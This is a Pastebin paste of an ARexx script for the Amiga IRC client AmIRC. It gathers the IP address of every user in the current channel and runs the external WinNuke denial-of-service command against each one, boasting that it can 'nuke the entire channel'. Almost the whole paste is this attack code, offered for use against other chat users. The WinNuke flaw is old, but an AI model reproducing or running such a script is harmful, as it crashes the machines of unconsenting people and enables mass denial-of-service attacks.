Advertisement
nicolascluz

WinNuke.AMIRX

Nov 10th, 2014
2,995
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Rexx 0.72 KB | None | 0 0
  1. /*
  2.    WinNuke.AMIRX
  3.    By Marcus Johansson, Polarn - #AmigaSWE
  4.    Put this in the rexx/ drawer of you AmIRC drawer.
  5.    Use '/rx nuke' to nuke the entire channel! :)
  6.    And dont forget to have the WinNuke cmd in C:
  7. */
  8.  
  9. parse arg args
  10. options results
  11.  
  12. ops = ""
  13. getmynick
  14. mynick = RESULT
  15. getchannel
  16. channel = RESULT
  17.  
  18. namevalid = 0
  19. count = 0
  20. do while namevalid = 0
  21.    getuserstate count
  22.    if rc = 5 then break
  23.  
  24.    getuser count
  25.    nick = RESULT
  26.  
  27.    USERHOST nick
  28.    host=RESULT
  29.    parse var host shit'@'ip
  30.    address command "run >nil: c:winnuke "ip
  31.  
  32.    'echo P='d2c(27)'b«WinNuke» Nuked: 'nick' - 'ip
  33.  
  34.    nicks = nicks nick
  35.  
  36.    count = count + 1
  37. end
  38. 'echo P='d2c(27)'b«WinNuke» Nuked:  'strip(nicks)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement